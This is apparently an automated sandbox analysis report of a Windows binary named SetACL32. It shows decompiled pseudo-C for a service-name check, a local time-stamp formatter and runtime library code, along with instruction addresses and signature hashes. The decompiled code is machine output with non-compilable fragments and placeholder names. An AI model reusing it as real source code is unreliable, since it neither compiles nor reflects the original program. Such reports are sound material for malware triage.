													if(_t342 != 0) {
														_t191 =  *((intOrPtr*)( *_t342 + 8))();
														__eflags = _t191;
														if(_t191 != 0) {
															 *((intOrPtr*)( *( *_t191)))(1);
														}
													}
													__eflags = _t234;
													if(__eflags != 0) {
														goto L84;
													} else {
														_push(1);
														_v12 = 0xa;
														_t343 = E012C9DCB(_t234, _t330, _t342, __eflags);
														_v24 = _t343;
														_v12 = 0xb;
														_push( &_v28);
														_t182 = E01298900(_t330, L"WINDOW MANAGER");
														_v12 = 0xffffffff;
														_t235 = _t182;
														__eflags = _t343;
														if(_t343 != 0) {
															_t189 =  *((intOrPtr*)( *_t343 + 8))();
															__eflags = _t189;
															if(_t189 != 0) {
																 *((intOrPtr*)( *( *_t189)))(1);
															}
														}
														__eflags = _t235;
														if(__eflags != 0) {
															goto L84;
														} else {
															_push(1);
															_v12 = 0xc;
															_t344 = E012C9DCB(_t235, _t330, _t343, __eflags);
															_v24 = _t344;
															_v12 = 0xd;
															_push( &_v28);
															_t236 = E01298900(_t330, L"Font Driver Host");
															__eflags = _t344;
															if(_t344 != 0) {
																_t187 =  *((intOrPtr*)( *_t344 + 8))();
																__eflags = _t187;
																if(_t187 != 0) {
																	 *( *_t187)(1);
																}
															}
															__eflags = _t236;
															if(_t236 != 0) {
																goto L84;
															} else {
																__eflags = 0;
																 *[fs:0x0] = _v20;
																return 0;
															}
														}
													}
												}
											}
										}
									}
								} else {
									_push(_t335);
									_t227 = E012A1E80(0, _t300, 0, _t335);
									_t242 = _t335 + _t335;
									_t326 = _t227 + _t242;
									_v124 = _t227;
									_v116 = _t326;
									E012CCDE0(_t326, _t227, 0, _t242);
									_t352 = _t352 + 0xc;
									_v120 = _t326;
									goto L25;
								}
							}
						} else {
							_t153 = GetLastError();
							__eflags = _t153 - 0xea;
							if(_t153 == 0xea) {
								goto L22;
							} else {
								__eflags = _t153 - 0x7a;
								if(_t153 != 0x7a) {
									goto L51;
								} else {
									goto L22;
								}
							}
						}
					} else {
						_t348 =  *(E012C9B70(_t325,  &_v136, _t334, E012C8BB0(__edx)) + 4);
						__eflags = _t348;
						if(_t348 == 0) {
							L14:
							_t334 = _v76;
							_t239 = _v80;
							goto L15;
						} else {
							__eflags = _t348 - _t325[2];
							if(_t348 == _t325[2]) {
								goto L14;
							} else {
								_t302 = _v92;
								_t221 =  &(_t348[6]);
								__eflags = _t302 - _t221;
								if(_t302 != _t221) {
									__eflags = _t221[0xa] - 8;
									_t298 = _t221[8];
									if(_t221[0xa] >= 8) {
										_t221 =  *_t221;
									}
									E012A1EE0(_t226, _t302, _t302, _t325, _t348, _t221, _t298);
								}
								_t297 = _v96;
								_t222 =  &(_t348[0x12]);
								__eflags = _v96 - _t222;
								if(_v96 != _t222) {
									__eflags = _t222[0xa] - 8;
									_t302 = _t222[8];
									if(_t222[0xa] >= 8) {
										_t222 =  *_t222;
									}
									E012A1EE0(_t226, _t297, _t302, _t325, _t348, _t222, _t302);
								}
								_t153 = 0;
								goto L51;
							}
						}
					}
				} else {
					_t153 = _t239 + 0x57;
					L51:
					 *[fs:0x0] = _v16;
					_pop(_t327);
					_pop(_t336);
					_pop(_t228);
					return E012CAE19(_t153, _t228, _v20 ^ _t349, _t302, _t327, _t336);
				}
			}


































































































              0x012c9020
              0x012c9023
              0x012c9025
              0x012c9030
              0x012c9031
              0x012c9034
              0x012c9039
              0x012c903b
              0x012c9041
              0x012c9045
              0x012c904b
              0x012c904d
              0x012c9050
              0x012c9052
              0x012c9058
              0x012c905b
              0x012c905e
              0x012c9064
              0x012c9067
              0x012c906a
              0x012c906d
              0x012c9074
              0x012c907d
              0x012c9087
              0x012c908d
              0x012c908f
              0x012c90fa
              0x012c90fa
              0x012c90fe
              0x012c9104
              0x012c9108
              0x012c910a
              0x012c910c
              0x012c910c
              0x012c9100
              0x012c9100
              0x012c9100
              0x012c911e
              0x012c9124
              0x012c9126
              0x012c913e
              0x012c913e
              0x012c9141
              0x012c9143
              0x012c9145
              0x012c9148
              0x012c914b
              0x012c914e
              0x012c9150
              0x012c9184
              0x012c9184
              0x012c918b
              0x012c918d
              0x012c9190
              0x012c9193
              0x012c919a
              0x012c91a1
              0x012c91a4
              0x012c91a7
              0x012c91a9
              0x012c91e2
              0x012c91e5
              0x012c91e9
              0x012c91eb
              0x012c91ee
              0x012c91f2
              0x012c91f8
              0x012c91fc
              0x012c91fe
              0x012c91fe
              0x012c91f4
              0x012c91f4
              0x012c91f4
              0x012c9208
              0x012c920f
              0x012c9215
              0x012c9217
              0x012c9227
              0x012c9229
              0x012c9229
              0x012c9230
              0x012c9230
              0x012c9233
              0x012c9236
              0x012c9236
              0x012c923b
              0x012c9244
              0x012c9249
              0x012c924b
              0x012c924b
              0x012c9250
              0x012c9250
              0x012c9253
              0x012c9256
              0x012c9256
              0x012c9260
              0x012c9264
              0x012c9269
              0x012c926d
              0x012c9275
              0x012c9280
              0x012c9284
              0x012c928f
              0x012c9298
              0x012c92a0
              0x012c92a9
              0x012c92ac
              0x012c92b1
              0x012c92b4
              0x012c92b9
              0x012c92b9
              0x012c92bc
              0x012c9219
              0x012c921f
              0x012c921f
              0x012c92c3
              0x012c92c5
              0x012c92f3
              0x012c92f3
              0x012c92f5
              0x012c9320
              0x012c9320
              0x00000000
              0x012c92f7
              0x012c92f9
              0x012c92fb
              0x012c92fe
              0x012c9304
              0x012c9316
              0x012c9316
              0x012c9318
              0x00000000
              0x012c9306
              0x012c9306
              0x012c9309
              0x012c9311
              0x012c9314
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c9314
              0x012c9304
              0x012c92c7
              0x012c92cc
              0x012c92cf
              0x012c92d5
              0x012c92e9
              0x012c92e9
              0x012c92eb
              0x012c92f0
              0x00000000
              0x012c92d7
              0x012c92d7
              0x012c92da
              0x012c92dd
              0x012c92df
              0x012c92e2
              0x012c92e5
              0x00000000
              0x012c92e7
              0x012c92e7
              0x00000000
              0x012c92e7
              0x012c92e5
              0x012c92d5
              0x012c91ab
              0x012c91ab
              0x012c91b0
              0x00000000
              0x012c91b6
              0x012c91b6
              0x012c91ba
              0x012c91c2
              0x012c91c2
              0x012c91c4
              0x012c91cb
              0x012c91ce
              0x012c91d1
              0x012c91d4
              0x012c91d9
              0x012c91dc
              0x012c91df
              0x00000000
              0x012c91df
              0x012c91b0
              0x012c9152
              0x012c9152
              0x012c9158
              0x012c933f
              0x012c9344
              0x012c9344
              0x012c9349
              0x012c9349
              0x012c934e
              0x012c934f
              0x012c9350
              0x012c9353
              0x012c9355
              0x012c9360
              0x012c9364
              0x012c9365
              0x012c9366
              0x012c9367
              0x012c936e
              0x012c9372
              0x012c9378
              0x012c937a
              0x012c937c
              0x012c9388
              0x012c938a
              0x012c9390
              0x012c9397
              0x012c939f
              0x012c93a7
              0x012c93ae
              0x012c93b0
              0x012c93b2
              0x012c93b8
              0x012c93bb
              0x012c93bd
              0x012c93c7
              0x012c93c7
              0x012c93bd
              0x012c93c9
              0x012c93cb
              0x012c95d9
              0x012c95de
              0x012c95ec
              0x012c93d1
              0x012c93d1
              0x012c93d3
              0x012c93df
              0x012c93e1
              0x012c93e7
              0x012c93ee
              0x012c93f6
              0x012c93fe
              0x012c9405
              0x012c9407
              0x012c9409
              0x012c940f
              0x012c9412
              0x012c9414
              0x012c941e
              0x012c941e
              0x012c9414
              0x012c9420
              0x012c9422
              0x00000000
              0x012c9428
              0x012c9428
              0x012c942a
              0x012c9436
              0x012c9438
              0x012c943e
              0x012c9448
              0x012c9450
              0x012c9457
              0x012c9459
              0x012c945b
              0x012c9461
              0x012c9464
              0x012c9466
              0x012c9470
              0x012c9470
              0x012c9466
              0x012c9472
              0x012c9474
              0x00000000
              0x012c947a
              0x012c947a
              0x012c947c
              0x012c9488
              0x012c948a
              0x012c9490
              0x012c9497
              0x012c949f
              0x012c94a7
              0x012c94ae
              0x012c94b0
              0x012c94b2
              0x012c94b8
              0x012c94bb
              0x012c94bd
              0x012c94c7
              0x012c94c7
              0x012c94bd
              0x012c94c9
              0x012c94cb
              0x00000000
              0x012c94d1
              0x012c94d1
              0x012c94d3
              0x012c94df
              0x012c94e1
              0x012c94e7
              0x012c94ee
              0x012c94f6
              0x012c94fe
              0x012c9505
              0x012c9507
              0x012c9509
              0x012c950f
              0x012c9512
              0x012c9514
              0x012c951e
              0x012c951e
              0x012c9514
              0x012c9520
              0x012c9522
              0x00000000
              0x012c9528
              0x012c9528
              0x012c952a
              0x012c9536
              0x012c9538
              0x012c953e
              0x012c9545
              0x012c954d
              0x012c9555
              0x012c955c
              0x012c955e
              0x012c9560
              0x012c9566
              0x012c9569
              0x012c956b
              0x012c9575
              0x012c9575
              0x012c956b
              0x012c9577
              0x012c9579
              0x00000000
              0x012c957b
              0x012c957b
              0x012c957d
              0x012c9589
              0x012c958b
              0x012c9591
              0x012c9598
              0x012c95a8
              0x012c95aa
              0x012c95ac
              0x012c95b2
              0x012c95b5
              0x012c95b7
              0x012c95bf
              0x012c95bf
              0x012c95b7
              0x012c95c1
              0x012c95c3
              0x00000000
              0x012c95c5
              0x012c95c5
              0x012c95ca
              0x012c95d8
              0x012c95d8
              0x012c95c3
              0x012c9579
              0x012c9522
              0x012c94cb
              0x012c9474
              0x012c9422
              0x012c915e
              0x012c915e
              0x012c9167
              0x012c9169
              0x012c9170
              0x012c9173
              0x012c9176
              0x012c9179
              0x012c917e
              0x012c9181
              0x00000000
              0x012c9181
              0x012c9158
              0x012c9128
              0x012c9128
              0x012c912e
              0x012c9133
              0x00000000
              0x012c9135
              0x012c9135
              0x012c9138
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c9138
              0x012c9133
              0x012c9091
              0x012c90a7
              0x012c90aa
              0x012c90ac
              0x012c90f4
              0x012c90f4
              0x012c90f7
              0x00000000
              0x012c90ae
              0x012c90ae
              0x012c90b1
              0x00000000
              0x012c90b3
              0x012c90b3
              0x012c90b6
              0x012c90b9
              0x012c90bb
              0x012c90bd
              0x012c90c1
              0x012c90c4
              0x012c90c6
              0x012c90c6
              0x012c90cc
              0x012c90cc
              0x012c90d1
              0x012c90d4
              0x012c90d7
              0x012c90d9
              0x012c90db
              0x012c90df
              0x012c90e2
              0x012c90e4
              0x012c90e4
              0x012c90e8
              0x012c90e8
              0x012c90ed
              0x00000000
              0x012c90ed
              0x012c90b1
              0x012c90ac
              0x012c907f
              0x012c907f
              0x012c9323
              0x012c9326
              0x012c932e
              0x012c932f
              0x012c9330
              0x012c933e
              0x012c933e

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Xinvalid_argumentstd::_
              • String ID: @Mhv
              • API String ID: 909987262-3595611156
              • Opcode ID: 459e8164af11ded6eca7fe25595060e765ef3c33c21dc1e22f75b2902b2d0a7c
              • Instruction ID: 24f33664f57b49b8d0436b540ff2b1195976dc4c623d53f2b834e3172c083e35
              • Opcode Fuzzy Hash: 459e8164af11ded6eca7fe25595060e765ef3c33c21dc1e22f75b2902b2d0a7c
              • Instruction Fuzzy Hash: 52B1B171D20209DFDF14DFA8C984BAEBBB9FF44B14F14025DEA06AB285D770A945CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A90C0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 265timeCOMMON
              Download Yara Rule
              C-Code - Quality: 56%
              			E012A90C0(void* __ebx, unsigned int __ecx, void* __edi, void* __esi, void* __fp0, long _a4, signed int _a8) {
				struct _TIME_ZONE_INFORMATION* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				struct _TIME_ZONE_INFORMATION* _v28;
				struct _TIME_ZONE_INFORMATION* _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				char _v232;
				char* _v236;
				intOrPtr _v240;
				char _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				struct _FILETIME _v272;
				unsigned int _v276;
				struct _FILETIME _v284;
				signed int _t151;
				signed int _t152;
				signed int _t167;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t193;
				struct _TIME_ZONE_INFORMATION* _t198;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				void* _t215;
				long _t218;
				signed int _t222;
				signed int _t225;
				struct _TIME_ZONE_INFORMATION* _t253;
				signed int _t254;
				unsigned int _t262;
				signed int _t265;
				signed int _t276;
				long _t282;
				signed int _t283;
				void* _t286;
				void* _t292;
				signed int _t297;
				void* _t302;
				void* _t309;

				_t309 = __fp0;
				_t295 = _t297;
				_push(0xffffffff);
				_push(0x12ea0d8);
				_push( *[fs:0x0]);
				_t151 =  *0x1309018; // 0xedd8d3b4
				_t152 = _t151 ^ _t297;
				_v20 = _t152;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t152);
				 *[fs:0x0] =  &_v16;
				_v276 = __ecx;
				_v252 = __ecx;
				_t282 = _a4;
				_t212 = _a8;
				_v252 = __ecx;
				if((_t282 | _t212) == 0) {
					GetSystemTimeAsFileTime( &_v272);
					_t212 = _v272.dwHighDateTime;
					_t282 = _v272.dwLowDateTime;
				} else {
					_v272.dwHighDateTime = _t212;
					_v272.dwLowDateTime = _t282;
				}
				FileTimeToSystemTime( &_v272,  &_v76);
				SystemTimeToTzSpecificLocalTime(0,  &_v76,  &_v60);
				FileTimeToLocalFileTime( &_v272,  &_v284);
				_t167 = _v284.dwHighDateTime;
				_t218 = _v284.dwLowDateTime;
				_v44 = 0;
				_v24 = 7;
				_v8 = 0;
				_t302 = _t167 - _t212;
				if(_t302 < 0) {
					L7:
					_t283 = _t282 - _t218;
					_v44 = 0x2d;
					asm("sbb ebx, eax");
					_t168 = _t283;
					_v260 = _t212;
					_v256 = _t168 * 0xe57a42bd;
					_t170 = _t283;
					_v252 = _t170 * 0xd6bf94d5 >> 0x20;
					_t172 = _t212;
					_t213 = _t172 * 0xe57a42bd >> 0x20;
					_t174 = _v260;
					_t262 = _t174 * 0xd6bf94d5 >> 0x20;
					_t175 = _t174 * 0xd6bf94d5;
					asm("adc ebx, 0x0");
					_t285 = _t170 * 0xd6bf94d5 + _t172 * 0xe57a42bd + (_t168 * 0xe57a42bd >> 0x20);
					__eflags = _t285;
					_t222 = _v252;
					_v264 = _t285;
				} else {
					if(_t302 > 0) {
						L6:
						_t254 = _t218 - _t282;
						_v44 = 0x2b;
						asm("sbb eax, ebx");
						_v248 = _t167;
						_t204 = _t254;
						_v256 = _t204 * 0xe57a42bd;
						_t206 = _t254;
						_v260 = _t206 * 0xd6bf94d5 >> 0x20;
						_t208 = _v248;
						_t213 = _t208 * 0xe57a42bd >> 0x20;
						_t210 = _v248;
						_t262 = _t210 * 0xd6bf94d5 >> 0x20;
						_t175 = _t210 * 0xd6bf94d5;
						asm("adc ebx, 0x0");
						_t285 = _t206 * 0xd6bf94d5 + _t208 * 0xe57a42bd + (_t204 * 0xe57a42bd >> 0x20);
						_t222 = _v260;
						_v256 = _t206 * 0xd6bf94d5 + _t208 * 0xe57a42bd + (_t204 * 0xe57a42bd >> 0x20);
					} else {
						_t303 = _t218 - _t282;
						if(_t218 < _t282) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				asm("adc ecx, 0x0");
				_v248 = _t175;
				_v28 = 1;
				_t214 = _t213 + _t222;
				asm("adc eax, eax");
				asm("adc edx, eax");
				_t225 = (_t262 << 0x00000020 | _v248 + _t213 + _t222) >> 0x17;
				_v252 = _t262 >> 0x17;
				_t265 = 0x91a2b3c5 * _t225 >> 0x20 >> 0xb;
				_v260 = _t265;
				_v248 = _t225 - _t265 * 0xe10;
				_t180 = E012986F0( &_v232, _t303, L"%04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d");
				_v8 = 1;
				_v244 =  &_v60;
				_v240 = E01298060;
				_v236 =  &M012A3D30;
				_t181 = E0129BDD0(_t213 + _t222, _t180,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wMonth);
				_v236 =  &M012A3D30;
				_t182 = E0129BDD0(_t213 + _t222, _t181,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wDay);
				_v236 =  &M012A3D30;
				_t183 = E0129BDD0(_t214, _t182,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wHour);
				_v236 =  &M012A3D30;
				_t184 = E0129BDD0(_t214, _t183,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wMinute);
				_v236 =  &M012A3D30;
				_t185 = E0129BDD0(_t214, _t184,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wSecond);
				_v236 =  &M012A3D30;
				_t186 = E0129BDD0(_t214, _t185,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &(_v60.wMilliseconds);
				_v236 =  &M012A3D30;
				_t187 = E0129BDD0(_t214, _t186,  &_v244, _t285);
				_v240 = E01298060;
				_t189 =  >=  ? _v44 :  &_v44;
				_v252 =  >=  ? _v44 :  &_v44;
				_v244 =  &_v252;
				_v236 =  &M0129D020;
				_t191 = E0129BDD0(_t214, _t187,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &_v260;
				_v236 =  &M012A6FC0;
				_t192 = E0129BDD0(_t214, _t191,  &_v244, _t285);
				_v240 = E01298060;
				_v244 =  &_v248;
				_v236 =  &M012A6FC0;
				_t193 = E0129BDD0(_t214, _t192,  &_v244, _t285);
				_t291 = _v276;
				L0129A0B0(_t193, _t309, _v276);
				E01297850( &_v232, _t285, _v276);
				_t276 = _v24;
				if(_t276 < 8) {
					L12:
					 *[fs:0x0] = _v16;
					_pop(_t286);
					_pop(_t292);
					_pop(_t215);
					return E012CAE19(_t291, _t215, _v20 ^ _t295, _t276, _t286, _t292);
				} else {
					_t253 = _v44;
					_t276 = 2 + _t276 * 2;
					_t198 = _t253;
					if(_t276 < 0x1000) {
						L11:
						_push(_t276);
						E012CAE27(_t253);
						goto L12;
					} else {
						_t253 =  *(_t253 - 4);
						_t276 = _t276 + 0x23;
						if(_t198 - _t253 + 0xfffffffc > 0x1f) {
							E012CF35F(_t214, _t253, _t276, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							return 0x130b6a8;
						} else {
							goto L11;
						}
					}
				}
			}

































































              0x012a90c0
              0x012a90c1
              0x012a90c3
              0x012a90c5
              0x012a90d0
              0x012a90d7
              0x012a90dc
              0x012a90de
              0x012a90e1
              0x012a90e2
              0x012a90e3
              0x012a90e4
              0x012a90e8
              0x012a90f0
              0x012a90f6
              0x012a90fc
              0x012a90ff
              0x012a9102
              0x012a910c
              0x012a9123
              0x012a9129
              0x012a912f
              0x012a910e
              0x012a910e
              0x012a9114
              0x012a9114
              0x012a9140
              0x012a9150
              0x012a9164
              0x012a916a
              0x012a9170
              0x012a9176
              0x012a917d
              0x012a9184
              0x012a918b
              0x012a918d
              0x012a91f6
              0x012a91f6
              0x012a91f8
              0x012a9204
              0x012a9206
              0x012a920a
              0x012a9210
              0x012a9218
              0x012a9223
              0x012a9229
              0x012a922f
              0x012a9231
              0x012a923c
              0x012a923c
              0x012a9240
              0x012a9243
              0x012a9243
              0x012a9245
              0x012a924b
              0x012a918f
              0x012a918f
              0x012a9195
              0x012a9195
              0x012a9197
              0x012a91a3
              0x012a91aa
              0x012a91b0
              0x012a91b4
              0x012a91bc
              0x012a91c2
              0x012a91c8
              0x012a91d2
              0x012a91d4
              0x012a91df
              0x012a91df
              0x012a91e3
              0x012a91e6
              0x012a91e8
              0x012a91ee
              0x012a9191
              0x012a9191
              0x012a9193
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9193
              0x012a918f
              0x012a9251
              0x012a9254
              0x012a925c
              0x012a9263
              0x012a9270
              0x012a9274
              0x012a927b
              0x012a9282
              0x012a928a
              0x012a9293
              0x012a929b
              0x012a92a7
              0x012a92ac
              0x012a92b3
              0x012a92c1
              0x012a92cb
              0x012a92d5
              0x012a92dd
              0x012a92e7
              0x012a92f5
              0x012a92ff
              0x012a9307
              0x012a9311
              0x012a931f
              0x012a9329
              0x012a9331
              0x012a933b
              0x012a9349
              0x012a9353
              0x012a935b
              0x012a9365
              0x012a9373
              0x012a937d
              0x012a9385
              0x012a938f
              0x012a939d
              0x012a93a7
              0x012a93af
              0x012a93b9
              0x012a93c7
              0x012a93d1
              0x012a93df
              0x012a93e9
              0x012a93ed
              0x012a93f9
              0x012a9405
              0x012a940f
              0x012a941a
              0x012a9424
              0x012a9432
              0x012a943c
              0x012a9447
              0x012a9451
              0x012a945f
              0x012a9469
              0x012a946e
              0x012a9477
              0x012a9482
              0x012a9487
              0x012a948d
              0x012a94bd
              0x012a94c2
              0x012a94ca
              0x012a94cb
              0x012a94cc
              0x012a94da
              0x012a948f
              0x012a948f
              0x012a9492
              0x012a9499
              0x012a94a1
              0x012a94b3
              0x012a94b3
              0x012a94b5
              0x00000000
              0x012a94a3
              0x012a94a3
              0x012a94a6
              0x012a94b1
              0x012a94db
              0x012a94e0
              0x012a94e1
              0x012a94e2
              0x012a94e3
              0x012a94e4
              0x012a94e5
              0x012a94e6
              0x012a94e7
              0x012a94e8
              0x012a94e9
              0x012a94ea
              0x012a94eb
              0x012a94ec
              0x012a94ed
              0x012a94ee
              0x012a94ef
              0x012a94f5
              0x00000000
              0x00000000
              0x00000000
              0x012a94b1
              0x012a94a1

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,EDD8D3B4,?,00000000,766DF6D0), ref: 012A9123
              • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,766DF6D0), ref: 012A9140
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,00000000,766DF6D0), ref: 012A9150
              • FileTimeToLocalFileTime.KERNEL32(?,?,?,00000000,766DF6D0), ref: 012A9164
              Strings
              • %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 012A926B
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Time$File$System$Local$Specific
              • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d
              • API String ID: 3144155402-169632472
              • Opcode ID: 5b6fc26d82e21a602dd1082d797966c0c1fa86ab0a46e3a0fde2672baf9c00bc
              • Instruction ID: 3c0a2e8cf573ffc5c3e9eda56cd29e0e8accb04bfe1f02abd08f375f5a095628
              • Opcode Fuzzy Hash: 5b6fc26d82e21a602dd1082d797966c0c1fa86ab0a46e3a0fde2672baf9c00bc
              • Instruction Fuzzy Hash: 36B12C71A5022E8FCF28DF59C854BEDBBB5AB98304F0485E9D51EA7740E7705A888F90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D7220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 75%
              			E012D7220(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x13091a0; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E012DA7C4(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E012D7FB2(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E012DA7C4(__eflags,  *0x13091a0, _t51);
							if(__eflags != 0) {
								E012D704E(_t51, 0x130b248);
								E012D800F(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E012DA7C4(__eflags,  *0x13091a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E012DA7C4(0,  *0x13091a0, 0);
							_push(0);
							L9:
							E012D800F();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E012DA785(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x13091a0; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E012D5772(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x13091a0; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E012DA7C4(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E012D7FB2(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E012DA7C4(__eflags,  *0x13091a0, _t60);
								if(__eflags != 0) {
									E012D704E(_t60, 0x130b248);
									E012D800F(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E012DA7C4(__eflags,  *0x13091a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E012DA7C4(__eflags,  *0x13091a0, _t20);
								_push(_t60);
								L25:
								E012D800F();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E012DA785(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x13091a0; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E012D5772(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x13091a0; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E012DA7C4(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E012D7FB2(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E012DA7C4(__eflags,  *0x13091a0, _t54);
											if(__eflags != 0) {
												E012D704E(_t54, 0x130b248);
												E012D800F(0);
												goto L45;
											} else {
												_t40 = 0;
												E012DA7C4(__eflags,  *0x13091a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E012DA7C4(0,  *0x13091a0, 0);
											_push(0);
											L41:
											E012D800F();
											goto L36;
										}
									}
								} else {
									_t54 = E012DA785(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x13091a0; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























              0x012d7220
              0x012d7220
              0x012d722b
              0x012d722d
              0x012d7232
              0x012d7235
              0x012d7253
              0x012d7256
              0x012d725b
              0x012d725d
              0x00000000
              0x012d725f
              0x012d726b
              0x012d726e
              0x012d726f
              0x012d7271
              0x012d7296
              0x012d7298
              0x012d72b1
              0x012d72b8
              0x012d72bd
              0x00000000
              0x012d729a
              0x012d729a
              0x012d72a3
              0x012d72a8
              0x00000000
              0x012d72a8
              0x012d7273
              0x012d7273
              0x012d7273
              0x012d727c
              0x012d7281
              0x012d7282
              0x012d7282
              0x012d7287
              0x00000000
              0x012d7287
              0x012d7271
              0x012d7237
              0x012d723d
              0x012d7241
              0x012d724e
              0x00000000
              0x012d7243
              0x012d7246
              0x012d72c0
              0x012d72c0
              0x012d7248
              0x012d7248
              0x012d7248
